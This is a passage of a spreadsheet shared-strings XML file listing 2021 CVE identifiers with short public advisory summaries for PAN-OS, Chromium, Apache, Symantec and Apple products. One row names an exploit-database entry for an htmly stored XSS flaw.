    <t>An improper access control vulnerability in PAN-OS software enables an attacker with authenticated access to GlobalProtect portals and gateways to connect to the EC2 instance metadata endpoint for VM-Series firewalls hosted on Amazon AWS. Exploitation of this vulnerability enables an attacker to perform any operations allowed by the EC2 role in AWS. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20 VM-Series firewalls; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11 VM-Series firewalls; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14 VM-Series firewalls; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8 VM-Series firewalls. Prisma Access customers are not impacted by this issue.</t>
  </si>
  <si>
    <t>CVE-2021-30620</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30620 Insufficient policy enforcement in Blink</t>
  </si>
  <si>
    <t>CVE-2021-30621</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30621 UI Spoofing in Autofill</t>
  </si>
  <si>
    <t>CVE-2021-30622</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30622 Use after free in WebApp Installs</t>
  </si>
  <si>
    <t>CVE-2021-30623</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30623 Use after free in Bookmarks</t>
  </si>
  <si>
    <t>CVE-2021-30624</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30624 Use after free in Autofill</t>
  </si>
  <si>
    <t>CVE-2021-30625</t>
  </si>
  <si>
    <t>Use after free in Selection API in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who convinced the user the visit a malicious website to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30626</t>
  </si>
  <si>
    <t>Out of bounds memory access in ANGLE in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30627</t>
  </si>
  <si>
    <t>Type confusion in Blink layout in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30628</t>
  </si>
  <si>
    <t>Stack buffer overflow in ANGLE in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30629</t>
  </si>
  <si>
    <t>Use after free in Permissions in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3063</t>
  </si>
  <si>
    <t>An improper handling of exceptional conditions vulnerability exists in Palo Alto Networks GlobalProtect portal and gateway interfaces that enables an unauthenticated network-based attacker to send specifically crafted traffic to a GlobalProtect interface that causes the service to stop responding. Repeated attempts to send this request result in denial of service to all PAN-OS services by restarting the device and putting it into maintenance mode. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.21; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h4; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h3; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8-h4; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. Prisma Access customers are not impacted by this issue.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49772.py</t>
  </si>
  <si>
    <t>htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>CVE-2021-30630</t>
  </si>
  <si>
    <t>Inappropriate implementation in Blink in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30632</t>
  </si>
  <si>
    <t>Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30633</t>
  </si>
  <si>
    <t>Use after free in Indexed DB API in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30635</t>
  </si>
  <si>
    <t>Sonatype Nexus Repository Manager 3.x before 3.30.1 allows a remote attacker to get a list of files and directories that exist in a UI-related folder via directory traversal (no customer-specific data is exposed).</t>
  </si>
  <si>
    <t>CVE-2021-30636</t>
  </si>
  <si>
    <t>In MediaTek LinkIt SDK before 4.6.1, there is a possible memory corruption due to an integer overflow during mishandled memory allocation by pvPortCalloc and pvPortRealloc.</t>
  </si>
  <si>
    <t>CVE-2021-30637</t>
  </si>
  <si>
    <t>htmly 2.8.0 allows stored XSS via the blog title, Tagline, or Description to config.html.php.</t>
  </si>
  <si>
    <t>CVE-2021-30638</t>
  </si>
  <si>
    <t>Information Exposure vulnerability in context asset handling of Apache Tapestry allows an attacker to download files inside WEB-INF if using a specially-constructed URL. This was caused by an incomplete fix for CVE-2020-13953. This issue affects Apache Tapestry Apache Tapestry 5.4.0 version to Apache Tapestry 5.6.3; Apache Tapestry 5.7.0 version and Apache Tapestry 5.7.1.</t>
  </si>
  <si>
    <t>CVE-2021-30639</t>
  </si>
  <si>
    <t>A vulnerability in Apache Tomcat allows an attacker to remotely trigger a denial of service. An error introduced as part of a change to improve error handling during non-blocking I/O meant that the error flag associated with the Request object was not reset between requests. This meant that once a non-blocking I/O error occurred, all future requests handled by that request object would fail. Users were able to trigger non-blocking I/O errors, e.g. by dropping a connection, thereby creating the possibility of triggering a DoS. Applications that do not use non-blocking I/O are not exposed to this vulnerability. This issue affects Apache Tomcat 10.0.3 to 10.0.4; 9.0.44; 8.5.64.</t>
  </si>
  <si>
    <t>CVE-2021-3064</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists in Palo Alto Networks GlobalProtect portal and gateway interfaces that enables an unauthenticated network-based attacker to disrupt system processes and potentially execute arbitrary code with root privileges. The attacker must have network access to the GlobalProtect interface to exploit this issue. This issue impacts PAN-OS 8.1 versions earlier than PAN-OS 8.1.17. Prisma Access customers are not impacted by this issue.</t>
  </si>
  <si>
    <t>CVE-2021-30640</t>
  </si>
  <si>
    <t>A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65.</t>
  </si>
  <si>
    <t>CVE-2021-30641</t>
  </si>
  <si>
    <t>Apache HTTP Server versions 2.4.39 to 2.4.46 Unexpected matching behavior with 'MergeSlashes OFF'</t>
  </si>
  <si>
    <t>CVE-2021-30642</t>
  </si>
  <si>
    <t>An input validation flaw in the Symantec Security Analytics web UI 7.2 prior 7.2.7, 8.1, prior to 8.1.3-NSR3, 8.2, prior to 8.2.1-NSR2 or 8.2.2 allows a remote, unauthenticated attacker to execute arbitrary OS commands on the target with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30648</t>
  </si>
  <si>
    <t>The Symantec Advanced Secure Gateway (ASG) and ProxySG web management consoles are susceptible to an authentication bypass vulnerability. An unauthenticated attacker can execute arbitrary CLI commands, view/modify the appliance configuration and policy, and shutdown/restart the appliance.</t>
  </si>
  <si>
    <t>CVE-2021-30650</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in the Symantec Layer7 API Management OAuth Toolkit (OTK) allows a remote attacker to craft a malicious URL for the OTK web UI and target OTK users with phishing attacks or other social engineering techniques. A successful attack allows injecting malicious code into the OTK web UI client application.</t>
  </si>
  <si>
    <t>CVE-2021-30651</t>
  </si>
  <si>
    <t>A malicious authenticated SMG administrator user can obtain passwords for external LDAP/Active Directory servers that they might not otherwise be authorized to access.</t>
  </si>
  <si>
    <t>CVE-2021-30652</t>
  </si>
  <si>
    <t>A race condition was addressed with additional validation. This issue is fixed in Security Update 2021-002 Catalina, Security Update 2021-003 Mojave, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5, macOS Big Sur 11.3. A malicious application may be able to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30653</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30654</t>
  </si>
  <si>
    <t>This issue was addressed by removing additional entitlements. This issue is fixed in GarageBand 10.4.3. A local attacker may be able to read sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-30655</t>
  </si>
  <si>
    <t>An application may be able to execute arbitrary code with system privileges. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. The issue was addressed with improved permissions logic.</t>
  </si>
  <si>
    <t>CVE-2021-30656</t>
  </si>
  <si>
    <t>An access issue was addressed with improved memory management. This issue is fixed in iOS 14.5 and iPadOS 14.5. A malicious application may be able to determine kernel memory layout.</t>
  </si>
  <si>
    <t>CVE-2021-30657</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited..</t>
  </si>
  <si>
    <t>CVE-2021-30658</t>
  </si>
  <si>
    <t>This issue was addressed with improved handling of file metadata. This issue is fixed in macOS Big Sur 11.3. A malicious application may bypass Gatekeeper checks.</t>
  </si>
  <si>
    <t>CVE-2021-30659</t>
  </si>
  <si>
    <t>A validation issue was addressed with improved logic. This issue is fixed in iOS 14.5 and iPadOS 14.5, watchOS 7.4, macOS Big Sur 11.3. A malicious application may be able to leak sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2021-30660</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. A malicious application may be able to disclose kernel memory.</t>
  </si>
  <si>
    <t>CVE-2021-30661</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in Safari 14.1, iOS 12.5.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5, macOS Big Sur 11.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..</t>
  </si>
  <si>
    <t>CVE-2021-30662</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 14.5 and iPadOS 14.5. Processing a maliciously crafted file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30663</t>
  </si>
  <si>
    <t>An integer overflow was addressed with improved input validation. This issue is fixed in iOS 14.5.1 and iPadOS 14.5.1, tvOS 14.6, iOS 12.5.3, Safari 14.1.1, macOS Big Sur 11.3.1. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30664</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing a maliciously crafted file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30665</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 7.4.1, iOS 14.5.1 and iPadOS 14.5.1, tvOS 14.6, iOS 12.5.3, macOS Big Sur 11.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..</t>
  </si>
  <si>
    <t>CVE-2021-30666</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 12.5.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..</t>
  </si>
  <si>
    <t>CVE-2021-30667</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in iOS 14.6 and iPadOS 14.6. An attacker in WiFi range may be able to force a client to use a less secure authentication mechanism.</t>
  </si>
  <si>
    <t>CVE-2021-30668</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.4. A person with physical access to a Mac may be able to bypass Login Window during a software update.</t>
  </si>
  <si>
    <t>CVE-2021-30669</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. A malicious application may bypass Gatekeeper checks.</t>
  </si>
  <si>
    <t>CVE-2021-30671</t>
  </si>
  <si>
    <t>A validation issue was addressed with improved logic. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina. A malicious application may be able to send unauthorized Apple events to Finder.</t>
  </si>
  <si>
    <t>CVE-2021-30672</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. A malicious application may be able to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30673</t>
  </si>
  <si>
    <t>An access issue was addressed with improved access restrictions. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina. A malicious application may be able to access a user's call history.</t>
  </si>
  <si>
    <t>CVE-2021-30674</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 14.6 and iPadOS 14.6. A malicious application may disclose restricted memory.</t>
  </si>
  <si>
    <t>CVE-2021-30675</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in Boot Camp 6.1.14. A malicious application may be able to elevate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30676</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. A local user may be able to cause unexpected system termination or read kernel memory.</t>
  </si>
  <si>
    <t>CVE-2021-30677</t>
  </si>
  <si>
    <t>This issue was addressed with improved environment sanitization. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave, macOS Big Sur 11.4, watchOS 7.5. A malicious application may be able to break out of its sandbox.</t>
  </si>
  <si>
    <t>CVE-2021-30678</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. A remote attacker may be able to cause unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30679</t>
  </si>
  <si>
    <t>This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. An application may be able to gain elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30680</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4. A local user may be able to load unsigned kernel extensions.</t>
  </si>
  <si>
    <t>CVE-2021-30681</t>
  </si>
  <si>
    <t>A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. A malicious application may be able to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30682</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious application may be able to leak sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2021-30683</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. A malicious application could execute arbitrary code leading to compromise of user information.</t>
  </si>
  <si>
    <t>CVE-2021-30684</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina. A remote attacker may cause an unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30685</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. Parsing a maliciously crafted audio file may lead to disclosure of user information.</t>
  </si>
  <si>
    <t>CVE-2021-30686</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. Processing a maliciously crafted audio file may disclose restricted memory.</t>
  </si>
  <si>
    <t>CVE-2021-30687</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in tvOS 14.6, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. Processing a maliciously crafted image may lead to disclosure of user information.</t>
  </si>
  <si>
    <t>CVE-2021-30688</t>
  </si>
  <si>
    <t>A malicious application may be able to break out of its sandbox. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina. A path handling issue was addressed with improved validation.</t>
  </si>
  <si>
    <t>CVE-2021-30689</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content may lead to universal cross site scripting.</t>
  </si>
  <si>
    <t>CVE-2021-30690</t>
  </si>
  <si>
    <t>Multiple issues in apache were addressed by updating apache to version 2.4.46. This issue is fixed in Security Update 2021-004 Mojave. Multiple issues in apache.</t>
  </si>
  <si>
    <t>CVE-2021-30691</t>
  </si>
  <si>
    <t>An information disclosure issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted USD file may disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2021-30692</t>
  </si>
  <si>
    <t>CVE-2021-30693</t>
  </si>
  <si>
    <t>A validation issue was addressed with improved logic. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30694</t>
  </si>
  <si>
    <t>CVE-2021-30695</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted USD file may disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2021-30696</t>
  </si>
  <si>
    <t>An attacker in a privileged network position may be able to misrepresent application state. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. A logic issue was addressed with improved state management.</t>
  </si>
  <si>
    <t>CVE-2021-30697</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in tvOS 14.6, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. A local user may be able to leak sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2021-30698</t>
  </si>
  <si>
    <t>A null pointer dereference was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.4, Safari 14.1.1, iOS 14.6 and iPadOS 14.6. A remote attacker may be able to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-30699</t>
  </si>
  <si>
    <t>A window management issue was addressed with improved state management. This issue is fixed in iOS 14.6 and iPadOS 14.6. A user may be able to view restricted content from the lockscreen.</t>
  </si>
  <si>
    <t>CVE-2021-30700</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.4, tvOS 14.6, watchOS 7.5, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted image may lead to disclosure of user information.</t>
  </si>
  <si>
    <t>CVE-2021-30701</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30702</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. A person with physical access to a Mac may be able to bypass Login Window.</t>
  </si>
  <si>
    <t>CVE-2021-30703</t>
  </si>
  <si>
    <t>A double free issue was addressed with improved memory management. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave, macOS Big Sur 11.4, watchOS 7.5. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30704</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in tvOS 14.6, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30705</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in tvOS 14.6, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. Processing a maliciously crafted ASTC file may disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2021-30706</t>
  </si>
  <si>
    <t>Processing a maliciously crafted image may lead to disclosure of user information. This issue is fixed in macOS Big Sur 11.4, tvOS 14.6, watchOS 7.5, iOS 14.6 and iPadOS 14.6. This issue was addressed with improved checks.</t>
  </si>
  <si>
    <t>CVE-2021-30707</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.4, tvOS 14.6, watchOS 7.5, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted audio file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30708</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30709</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted USD file may disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2021-30710</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 14.6, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. A malicious application may cause a denial of service or potentially disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2021-30712</t>
  </si>
  <si>
    <t>CVE-2021-30713</t>
  </si>
  <si>
    <t>A permissions issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.4. A malicious application may be able to bypass Privacy preferences. Apple is aware of a report that this issue may have been actively exploited..</t>
  </si>
  <si>
    <t>CVE-2021-30714</t>
  </si>
  <si>
    <t>A race condition was addressed with improved state handling. This issue is fixed in iOS 14.6 and iPadOS 14.6. An application may be able to cause unexpected system termination or write kernel memory.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2021-30715</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. Processing a maliciously crafted message may lead to a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-30716</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. An attacker in a privileged network position may be able to perform denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-30717</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. An attacker in a privileged network position may be able to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-30718</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.4. A non-privileged user may be able to modify restricted settings.</t>
  </si>
  <si>
    <t>CVE-2021-30719</t>
  </si>
  <si>
    <t>A local user may be able to cause unexpected system termination or read kernel memory. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina. An out-of-bounds read issue was addressed by removing the vulnerable code.</t>
  </si>
  <si>
    <t>CVE-2021-30720</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious website may be able to access restricted ports on arbitrary servers.</t>
  </si>
  <si>
    <t>CVE-2021-30721</t>
  </si>
  <si>
    <t>A path handling issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. An attacker in a privileged network position may be able to leak sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2021-30722</t>
  </si>
  <si>
    <t>An information disclosure issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. An attacker in a privileged network position may be able to leak sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2021-30723</t>
  </si>
  <si>
    <t>CVE-2021-30724</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in tvOS 14.6, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. A local attacker may be able to elevate their privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30725</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30726</t>
  </si>
  <si>
    <t>A malicious application may be able to execute arbitrary code with kernel privileges. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. An out-of-bounds write issue was addressed with improved bounds checking.</t>
  </si>
  <si>
    <t>CVE-2021-30727</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.4, tvOS 14.6, watchOS 7.5, iOS 14.6 and iPadOS 14.6. A malicious application may be able to modify protected parts of the file system.</t>
  </si>
  <si>
    <t>CVE-2021-30728</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-003 Catalina, Security Update 2021-004 Mojave. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30729</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 14.6 and iPadOS 14.6. A device may accept invalid activation results.</t>
  </si>
  <si>
    <t>CVE-2021-30731</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-004 Catalina. An unprivileged application may be able to capture USB devices.</t>
  </si>
  <si>
    <t>CVE-2021-30733</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave, macOS Big Sur 11.4, watchOS 7.5. Processing a maliciously crafted font may result in the disclosure of process memory.</t>
  </si>
  <si>
    <t>CVE-2021-30734</t>
  </si>
  <si>
    <t>Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30735</t>
  </si>
  <si>
    <t>CVE-2021-30736</t>
  </si>
  <si>
    <t>A buffer overflow was addressed with improved size validation. This issue is fixed in macOS Big Sur 11.4, tvOS 14.6, watchOS 7.5, iOS 14.6 and iPadOS 14.6. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30737</t>
  </si>
  <si>
    <t>A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code. This issue is fixed in tvOS 14.6, Security Update 2021-004 Mojave, iOS 14.6 and iPadOS 14.6, iOS 12.5.4, Security Update 2021-003 Catalina, macOS Big Sur 11.4, watchOS 7.5. Processing a maliciously crafted certificate may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30738</t>
  </si>
  <si>
